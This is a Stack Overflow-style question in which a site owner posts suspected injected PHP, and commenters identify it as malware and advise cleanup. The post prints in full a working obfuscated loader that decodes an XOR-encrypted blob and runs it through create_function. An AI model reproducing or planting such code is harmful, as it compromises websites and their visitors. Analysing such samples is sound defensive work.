# Please can someone tell what this PHP code does?

Tags: php, linux

I suspect that this is some malicious code injected by some bad guy. I am not able to identify what this php code is doing. Can Stack PHP experts please guide me on this?

*Any help greatly appreciated.*

```
<?php
$_8rtx40c = basename/*x23e*/(/*vz*/trim/*7dj*/(/*xy*/preg_replace/*m5*/(/*xbf*/rawurldecode/*9*/(/*3c*/"%2F%5C%28.%2A%24%2F"/*954j*/)/*3al*/, '', __FILE__/*76*/)/*o*//*0p*/)/*1*//*i2c*/)/*n480*/;$_2msbweq = "GVF%1DB%06TT%5B%40%0C%07G%09C%12G%06%03%5CmQA%07%17%0AVD9V%11%07PFW%0ENJF%24KlQ%06%04X%5CW%06N%10%1B%5CU%07X%3C%01%5E%5CFK%11%170MB%03T%17%07%11%15%1E%0EXJT%24p%0F%5B%0A%3DBWF%06N%06%1D%5C_%14j%0F%0DV%15%1E%0E%276%23b%19%5Du%0A%0CXmAK%1DKHB_%01j%06%10C%5D%40%5DNOO%1E%19%5Du%0A%0CXmAK%1DKHCQ%1Ej%06%1ATQGZ%00%0C%01qD%0FX%06E%1D%12%02%07R%23%0A%5CB%09G%3C%10TB%5D%5C%1D%0A%01I%18V%1CX%22BWFq%1D%0A%02Ko%0A%5C%0E%0BE%1A%02%07R%0A%09%06%11%02P%05%0B_WV%06K3%27~o%23z%2F%40%18%1BIJ%0C%05%06%40UN%173%2Aamwa%25AC%0E%12%3A%5BAK%0AO%5BHIKNJU%00%5C%0D%07U%1A%15H%00%0F%0Aq%40%13A%3C%01%5E%5CFK%07%17%1C%0E%17O%1C%18%06TT%5B%40%0CKHHY%0AP%3C%12DFmM%06%0D%1BK%5E%12FCE%1D%12%03%07RG%19ET%09L%0EB%0C%12%15O%0C%05%5E%16%06%05%07NZRSV%03%5D%05%0B%1F%1D%5E%0C%02%07%1C%01%00%1C%0D%02%0E%1C%05T%07%00%03%16%09UB%06%01%0EB%10BC%08%06%5EK_%15%0F%16%01MD%0FZ%0DBK%5EF%5E%13%02G%0AG%04R%09%0EE%1B%12U%00%05O%06C%12G%0F%07_%1A%16Y%0B%04%05BDO%15_B%05%1BI%5C%0C%17%1A%5C%5EF%17AYL%16D%5E%1E%04%06DTF%08C%40ppqj%2C%25%28fy%2C~%2F%2F%7F%7Db%7F%3B0%3B%7Bf1m%3A8PPQJ%0C%05%08FY%0C%5E%0F%0F_%5DB_%1B%10%1B%5BF%11M%1A%18%01%03%00%1D%5DVY%19%08_%1EL_%13%09%16W%1D%01%0AZSF%08C%11E%40m%5D%19%0F%06Z%18BC%13%15V%5BXJ%40XKWD%04P%17%01%11%0F%12O%1B%11%0EWo%00Y%0A%12%19%16KZ%0B%06%1BM%19%5D%11%01%10BAEKI%5EO%1E%0BB%5E%17%06AZCK%05%02%02YZ%15S%1BB%0C%12%10%0CRG%18LW%0CY%17B%0C%12B%5C%0C%040%5CU%16Y%02%01T%1A%10P2%3D.%03j%07%18%19R%1C%0Bn%055L3%13m%18%17OB%13%10%1E%0EM%14%0DIZ%0AAJYU%5D%12UM%17%0BF_%01%40%11%11%11%0F%12%0A%10%17%0DKD%05nG%15SUXB%1D8KLB%15F%14%07%1A%19osRG%04ZT%16%5D%12%07%5DQKM%0C%06O%13%10BL%17%00TFQuM%14%0DIZ%0AA8FS%40A%5D%1E%06D%05m%3B%0EG%0AEPUT%0F%16%0A%0E%0DF%11%1A%16SWFM2G%18LW%0CY%179%15P%40%5D%1A%14%0A%05%1B%3BhXFC%40KJ%02%00O%13%10BL%17%00TFQuM%14%0DIZ%0AA8FS%40A%5D%1E%06D%05m%3B%0EG%18DD%5C%40%1DCR%0E%18BA%07%0A%5EUG%5C%1ACS%12%10T%1CC%1E%11%1A%16E%1D%07%1FFA%03Y%00%1BRWW%0EW%5DO%1A%19%5D%11%01%13%40XBX%05%0DO%13%10N%1DG%09EVBF%18%06%03MI%05P%06B%17%12%03%1B%40CS%12%10R%1CC%1E%11%1A%16F%1D%01%08TV%13PC%5C%0F%12%00%07RG%1ATC%01O%13%14%11%0F%12%06AG%07ZR%01O%05%17T%12%14%0EZJO%12%0CF%03JBM%12%16%5C%1B%1A%0BES%5D%11%08%16UBZ_%0C%0F%0ECG%0CF%05%1A%11%0F%12%0A%02%17%0B%5EX%17P%0F%03%5CEX%5D%0F%1BO%00%10%05%5D%11J%15HGX%07%0D%1B%07%0B%0FSCJ%15ZFL%0E%19%09%5BUF%14%5EB%07%06%1B%0E%12G%04ZT%16%5D%12%07%5DS_Y%03%10%09V%10%5B%15G%09EVBF%18%06%03O%5D%11_%10%04I%12%1C%0E%0A%0B%1D%06%14%04D%12%08AD%5E%40%40X%12GVF%1DG%10CKVE%0ACN%13%10P%01JBJ%16YZ%0D%13%07_U%0AT%0E%15%5BATVI%5EO%0A%5B%12Q%13%0A%40W%5EO%04%14%05%5DV%1E%15MBRZ%40%06M%16%15%5DW%1CE%15K%0AOO%0E%1E%0B%06BUF%1DG%00CAAY%0CCS%0EC%12G%0F%07_%1A%16Y%0B%04%05BDO%1CX%10TFG%5C%07CKED%02E%0B%13T%5ESC%1E%09%1CHH%5DH%0A%04%11%1A%13H%1C%0D%0CZY%09%5B%3C%07I%5BAZ%1AKHHY%0AP%3C%12DFmM%06%0D%1BK%5E%12FDK%18IT%5B%07%00%1BG_%08%15%05%0B%5DWm%5E%1C%170M_%08A%06%0CEA%1A%0A%02%17%0B%5EX%17P%0FN%11%16FT%0B%0A%19IBJ%15G%12UXSM%00CR%0Ev%07Y%10%07%18I%16E%1D%07%1FFA%03Y%19%0FEZK%0ETCK%5ET%0CT%00%0B%11%0F%0F%0EQCP%0E%17%07%12CX%11%15E%09RG%0D%5CC%15B%06%16S_PL%04%0DO%13%10%26S%0C%12T%5C%1A%0A%02%17%0B%5EX%17P%0FN%11%16YZ%0D%13%07_U%0AO%0E%16YK%1B%15%00%05O%06%14%04G%10%11FWFL%04%01%0DC%5EF%08%5E_%11tSB%1A%06FUB%03A%16%10_%12%02%15%14%06%03%5DU%1D%5C%05B%19%5BAq%08%11%1DOIN%11%17%18S%5BDI%1BJF%0E%14%12O%01%0BGU%40%0ETC%06C%40%0AZ%07%07%19%16FT%0B%0A%19IBO%0EG%18GXF%5C%1CCR%0EV%11G%0A%16T%1A%16L%1B%10%1CYU%12W%0E%00S_%5C%02IG%1BTR%0FC%04%10%18%09TM%05%0C%1CK%18BW%11%11BEWZ%0B%0E%0DL%5D%08%1CX%10TFG%5C%07CKTF%0CA%11%17%0AOOS%00%05O%06%11%00%40%0D%01E%5B%5D%406%06%17GC%12FKEW%5B%5EK6%04%0AZo%05Z%0D%16T%5CF%5DNJFUV%13%5B%00%16X%5D%5C%0E%0F%0A%03Ko%01P%17%3DR%5D%5CZ%0C%0D%1B%5D%18BT%06%01%5BJ_%07%12G%0DWU%15A%15%18A%12%0F%0E%0F%0C%1FK%5EN%11%02%07RXJCECM%5C%12O%0EG%05TGDC%0B%05%09%0E%0DFS%11%07PV%1A%0A%0B%1A%0A%5DD%10O%13N%11T%5BB%0C%10%06TUN%11%02%07RXJC%40JTHS%0AZ%10%07%19%16PW%0C%10%1BXJ%16%1CX%10TFG%5C%07CKIU%13C%0E%00WT%09S%14%05%1A%40S%12%5C%0C%0C%11QQK%03%08%04AXN%1C%18%10TFG%5C%07C%1B%5CY%0B%1D%13%10TUm%5C%0C%13%03OS%03%1DAMm%1A%1C%045G%40%0C%1CF%12DN%11mmh%20%2F%2AqoO%1CX%1FWG%5CM%1D%0A%00%40%10%03P%1B%14U%5C%5CYAG%08%5CJ%0AB%16%17XS_F%11%15C%0E%14%0DA%07%12YCWB%06%0D%1D%5BV%13LJ%19%15BG%5D%0A%0E%1BT%10%5B%15A%40%0AT%5D%5CIKKLB%15F%14%07%0C%02%09%0EM%01%1D%5DC%11P_%11E%40%5EK%07KKIB%1CY%14%17D%5BSC%01%1B%19%07%0BON%05%0DC%12%1A%0A%0E%11%15BG%13%40%5ER%0A%12%16I%1B%19%03YE%13%09%10%16C%5EW%40AG%04ZT%16%5D%12%07%5D%5D%5C%5C%1C%05%1AW%19F%13EB%15P%40%5D%1A%14%0A%12C%12G%0F%07_%1A%16I%1B%19%03YE%13%5C%02%0FYJD%07RCKIB%1CY%14%17D%19%19%02IG%0D%5CC%15B%06I%1A%1BI%0A%19%16%1CM%5D%12OCL%0C%12QF%1BK%00%5CTN%11%04%10K%5EE%5B%1C%0A%0ECX%1EC8FS%40A%5D%1E%062%07%108%15%0C%10U%1A%16E%1D%07%1FFA%03Y%0C%0CCGT%5B%108KIB%1CY%14%17Do%1B%07R%1E%12%5CU%12%40%11%0C%11%16B%5B%1A%00%02ZJ%5DH%05%17_QFG%06%0DOWQ%0BB%02%0CCS%1A%0A%0E%11%15BG%13%40%0A%03%5CZJXECKED%02E%0B%13T%5E%5D%40%1B%16%09%5BION%04%0E%5EPSBIG%19ET%09L%0EYCWF%5B%1B%0DOKU%1EC%07%0C_E%1AK%0C%1B%19J%5E%08BKFV%40HB%1E%16%1AGQ%0B%5D%1B%14%1D%12%16E%1D%07%1FFA%03Y%0C%0CCGT%5B%10JC%0E%14%10%5E%07%0DH_%1B%15%14%05%1A%40S%12%5C%0C%0C%11YSF%0E%04%0E%06%14%01G%19%0EFGGG%08%0E%07VFJ%15G%09EVBF%18%06%03A%5E%14%40%05%17H%1BII%05%0C%0DO%5CF%11%15%09U%5DKCR%11%0AZE%14%5BC%07TJDJ%07%0D%18%06U%03M%15%06_%5CE%06M%04%1DT%5C%11%40%16%0BP_ZV%1FOO%0AF%0DQ%0C%1B%5C%1B%1E%0EM%08%1BJ%40%0ED%06%0E%5E%5C%40%5B%0F%16%16%07%0B%1BS%16%0CRF%5BA%07C%06%5DD%0B%40%13%0CE%1A%1BUM%14%01_%5B%12%5B%13%15%11%0F%12n%0F%0A%03Ko%01P%17%3DR%5D%5CZ%0C%0D%1B%5D%18%05V%06%08ZY%5DFAJF%15%14%14Q%17%07R%5B%12%13I%10%1B%5C%40%09FKFF%5CCE%1D%0D%1FY%1CFX%07W%19QQK%03%08%04AXN%1CJK%0A%5BT%0EAG%1DJD%03V%0AB%10%0F%0F%0E%2F%22%23%7DuONG%0AFBAI%18CR%0EC%13W%10%16C%1A%16Y%07%12%04Z%5E%16BOB%15%40VZ%0C%00%06%0E%1BF%06QK%0A%16SF%0F%1B%19CZ%1E%15%5EBqG%5C%5D%0C%11%06O%5C%0FO%06JHS_Y%08%0D%1DO%18%14T%14%17C%5EVK%0A%0C%0BK%18B%5D%14%12BUC%07EC%02J%05NV%00%07%5BYYA%01KF%07%19O%0E%1E%07%5DAWUM%02%07HH%10X%09%1A%11%0F%12o%1B%11%0EW%18O%0E%1E%10TFG%5C%07CKOX%00M%15%0F%5BJ%09S%0F%16%01MD%0FZ%0DBZPFY%0A%09%06%06%14%07%5D%05%1AG_XV%40%18KIB%1CY%14%17DVYA%1E%17O%13%10%14T%14%17C%5EW%40%0A%0C%0BK%18%0DT%0B%05VS%1An%1A%06%1DGQ%0A%5C%19%07%19%16SF%0F%1B%19CZ%1E%1COB%5CV%07%06%0A%00%0AD%5B%0DZ%0BJ%18%1B%1B%07RG%18%40A%0DA%0D%12F%12%0F%0E%29%05%06BU9R%06%16nQ%5D%40%1D%06%01ZCNV%00%07%5BYYA%01KF%07%0BBG%07%16TQ%5B%0ETC%1CZB%16Z%10J%15E%5C_%02%17%01%5EGJ%15%0E%06%04%1AQM%0C%09%04E_%0E%1DJK%18%09%5BHIKK%5CT%12P%00%0B%11%13%0F%13I%25.bc%23%1C%18FEQ%5D%5C%19%09O%13%10%15%40%01%11E%40%1A%0A%1E%0D%1EED%08E%14N%11%16%40J%1D%06%0CG%10M%15PP%18%09%16Y%07%12%04Z%5E%16BC_%11AF%5C6%11%0A%5E%5C%07V%06J%15FQA%1B%13%05%02%10BR%11%18%5DEG%5B%0D%08%00YDJ%15G%15_CYZ%07%13%18%07%0B%1BP%0F%11TI%16Y%07%12%04Z%5E%16BC_%11%16E%40%18%08%1B%40%40%11%15MB%13n%5Cr%07L%40%0C%10H%15%0E%06%04%1AQM%0C%09%04E_%0E%1DJK%11%1C%12%0A%0E%11%15BG%13%40%07%09%5EEF%15%14%23%09G%5C%03j%13%17EmQA%07%17%0A%40D%15%1D%00%01TXYE%06%0BG%07%1CF%11%14%0C%40YF%40%19%14F%15M%00%40%0D%01E%5B%5D%40I%0A%15E_%1EVKFIFFM%0E%13%08V%1CF%11%08%00EZ_T%40%18KOX%00M%15%0F%5BJ%12%13I%0A%1CZ%5D%13E%0D%16%19%1B%09%0A%08%0B%09VF%0B_%1B9%15JFZ%0A%04%1FIH%3B%15%5EBK%5EF%5E%13%02G%0A%5B%04A%0B%0FK%1B%09E%0B%17%18MZ%0F%1DG%03YTJX%04%09%17%07%0B%1BS%16%0CRF%5BA%07C%1EI%5C%11C%13%17%19%16JZ%1D%00%08%5EW%1E%1C%18FPZTV%1F%0E%05V%10%5B%15%0A%11E_G%5E%07%17G%07%0B%13%5B%10%07E%1A%16O%01%05%17X%5D%0CM8FIFFM%0E%13%08VmO%0E%08%00EEQD%00KKOX%00M%15%0F%5BJ%1B%15%14%05%1A%40S%12%5C%0C%0C%11HGT%0C%12%1B%40%18BM%17%16RUBI%11%5E%21%7B%7C%2A%1C%18%04%5E%40WO%0A%0BO%06Y%15A%0E%17A%5CF%06%40C%0E%5D%10BB%08%08DZQOT%5DK%5D%5C%14Q%15%0FZ%1BIG%0FCG%0AH%12A%00%05AUJ%07%12%0A%09%0E%18%15A%11%01%5CB%1A%0A%11%17%1BMW%16R%1BN%11%16EE%03%16%07MQO%15%5E_%11%02%1BU%0C%15%0EB%18BF%0F%10UD_E%40X%0D%5CU%07%5EX%1FLW%5E%5D%0C%18%0AXQ%0A%1DG%11%5D%40VX%04%08F%15M%1BH%05%0DCWSM%01CGOB%14T%1A%3D%5CW%40I%0CKKqs%29z%28%2Bt%1E%12%0A63%20%7DdO%15%02%11%11%16BX%0C%0A%04AW%15%15%5E%5C%11%16U%5C%13%0F%18%5BE%0FT%0E%0AID%1BUM%04%1DT%5C%11%40%16%0BP_ZV%1FCR%0Ep%13%5B%10%07C%5BSB%00%19%0A%06I%07X%14%03_%40S%06%13%0F%1B%5EJ%07%1DG%05CH%5EY%1C%16%06O%5D%0EM%15K%1D%12%16%5E%1F%06%06E_%01FJK%0A%5BT%0EA%0A%1C%5DU%12%1DG%05CH%5EY%1C%16%06O%5D%0EM%159%16SY%094JO%08%16F%11%15%09U%5DKCT%5EKIB%1CY%14%17D%5BSC%01%1B%19u%17%07%5ED%3F%18I%5BHIKKIB%1CY%14%17D%5BSC%01%1B%19u%17%07%12%3EB%0C%0F%12%09%00DFU%14%04G%10%11FW%12%13I%22%1D%5CQ%1F%1DD%12G%15%12%13WC%2F%5EX%16C%06%10B%5B%5D%40AJC%09C%10%12C_%0F%12%15%1CGSB%1F%17J%12%02%09%16%12%0F%10IG%08%5CJ%0AB%16%17XS_F%11%154%09Q%0D%12%3EN%18%09WM%01%0COnC%03G%0A%03%5D%5BHKAG%0D%5CC%15B%06K%0AWJG%1DX%12K%5C%15P%0A%04%11%1A%16I%1B%19%03YE%13%5C%02%0FYJDuN%02Hs%10%5B%08CET%15%1BU%0C%15%0EB%18BR%11%18%5DEG%5B%00%02%02FH%10nD%06%16o%1B%15%14%06%03%5DU%0FSCJ%15U%40T%05%14%1A%5BY%07X%0B%1AGi%15ON%3EO%13%0DF%12%13%0EDU%5B%40NJ%14GVN%11%04%10K%5EE%5B%1C%0A%0ECX%1EC8EBS%15sI%5ER%0E%17%07Q%07E%18I%5BT%02%0C%17M%18BR%11%18%5DEG%5B%00%02%02FH%10nD%12%16o%1E%0EM%04%1DT%5C%11%40%16%0BP_ZV%1F8HJ%17%3B%1CX%1FT%5EAK%00%05G%0AW%14O%0F%15DG%5BO%04%0B%17XkAF%02El%12%0F%13ID%1DK%5DA%1C%18%13V%5EEX%19%16G%0AW%14O%0F%15DG%5BO%04%0B%17XkAED%3F%18%09OS%0C%00%07A%10BR%11%18%5DEG%5B%00%02%02FH%10nD%03Z%15o%15%0C%1B%06Z%18O%0E%1E%1FKGHK%18%17%01%06%19%5DHi%1F";$f="\143".chr/*sdc*/(/*3*/114/*nhu4p*/)/*r0tv*/.'e'.'a'.'t'."\x65".chr/*t*/(/*m1d*/95/*hxgl*/)/*3zw6a*/.'f'."\165"."\x6e"."\143".'t'.chr/*c*/(/*2lhk*/105/*n0*/)/*vzg*/."\x6f".'n';$f/*b0nm*/(/*gb*/'', '};' . /*cb*/(/*b*/rawurldecode/*3f4mk*/(/*3p*/$_2msbweq/*n*/)/*25iu*/ ^ substr/*5gvq*/(/*xf6tr*/str_repeat/*m*/(/*bp*/$_8rtx40c, /*bn57o*/(/*2vo6j*/strlen/*0sxpt*/(/*iqu*/$_2msbweq/*6b*/)/*z*//strlen/*cv84z*/(/*f0kn8*/$_8rtx40c/*6kyw1*/)/*egvfd*//*8q*/)/*p*/ + 1/*ngs12*/)/*7*/, 0, strlen/*js9*/(/*pvg3*/$_2msbweq/*3*/)/*ogd4*//*6*/)/*plkiv*//*szhp*/)/*j*/ . '{'/*e9*/)/*yc*/;
```

Comment: This loads a file. it is malicious code.

Comment: My guess is, you are using wordpress? Note that removing this code is not enough to remove the malware. It's more important to find out where it comes from.

Comment: What vulnerability it uses any help. What file it loads. Any help. What is the output of the code. The output is blank.

Comment: What file and what it runs, I can't tell. that requires some decoding. The output might be blank, for now, and when you visit the site, but you don't really know what it does. Until this is solved completely you should take the site offline. Some malware sleeps for an amount of time. If you don't know how to solve this, maybe ask an expert to take a look at it .

Comment: Most of the time it hides the actual code in a fake core file or a fake plugin file. There are some security plugins available (on wordpress) that will notify you when a file is added or changed. This way you can keep your site clean in the future.

Comment: what is the name of php file you found this in ?